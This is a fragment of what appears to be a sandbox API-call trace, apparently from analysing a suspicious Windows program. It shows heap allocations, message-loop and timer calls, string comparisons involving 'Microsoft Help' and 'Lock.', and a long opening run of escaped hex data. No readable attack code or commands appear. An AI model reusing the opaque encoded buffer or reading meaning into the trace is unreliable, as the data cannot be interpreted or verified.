bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 32 [0247.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0247.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0247.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0247.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0247.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0247.983] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0247.983] TranslateMessage (lpMsg=0x8bf970) returned 0 [0247.983] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0247.983] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0247.983] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0247.984] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0247.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0247.984] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0247.984] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0247.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0247.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0247.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0247.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0247.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="soft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ft Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0247.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Help", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0247.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0247.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0247.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0247.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0247.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0247.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0247.985] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0247.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0247.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0247.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0247.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0247.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 